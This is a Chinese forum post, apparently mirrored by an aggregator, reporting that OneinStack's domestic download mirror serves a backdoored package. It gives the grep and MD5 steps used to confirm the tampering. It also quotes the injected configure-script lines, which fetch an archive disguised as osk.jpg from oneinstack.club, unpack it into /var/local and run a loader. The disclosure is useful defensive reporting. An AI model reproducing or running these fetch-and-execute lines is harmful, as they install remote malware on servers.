2

Oneinstack 国内下载源也被挂马

 8 months ago
source link: https://www.v2ex.com/t/979226
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

V2EX  ›  分享发现

Oneinstack 国内下载源也被挂马

  imhx233 · 13 小时 33 分钟前 · 2096 次点击

(从海外节点下载暂未发现有此问题)

mirrors.oneinstack.com CNAME 到 seo-one-01.xnsksstack.com,这个域名 DNS 为 DNSPod ,国内解析为 CNAME mirrors.oneinstack.com.w.cdngslb.com. 阿里云 CDN(含恶意代码),海外解析为 A 47.251.13.6 阿里云美国单点

# 国内机器或手动指定 mirrors.oneinstack.com.w.cdngslb.com 国内 IP

wget http://mirrors.oneinstack.com/oneinstack-full.tar.gz
tar -xzf oneinstack-full.tar.gz
cd oneinstack/src
tar -xzf pcre-8.45.tar.gz
cd pcre-8.45
grep -r "oneinstack.club" pcre-8.45

结果(pcre-8.45/configure 第 6883 行):

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

验证 MD5:

# 恶意包
md5sum oneinstack-full.tar.gz
3dc788dd9fe0c13e3db1411e53932331  oneinstack-full.tar.gz

#海外节点包(暂未发现有此问题)
aa55626f6ba9eb8cae2f5a3d9c6c9b96  oneinstack-full.tar.gz

国内国外包对比(右边海外左边国内):

714253106.png
3337536641.png

第 1 条附言  ·  12 小时 49 分钟前

root@Huangxins-PC:~/oneinstack/src# grep -r '/var/local/' ~/oneinstack/
/root/oneinstack/src/pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null
/root/oneinstack/src/pcre-8.45/configure:rm -f /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:/var/local/cron/load linhkkngf@QWE

lnmp.org 和半年前的 Oneinstack 挂马(GitHub)一样。

恶意域名 oneinstack.club 注册于 2023-08-28,和 lnmp 的恶意域名 lnmp.life 注册日期、注册商均一致


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK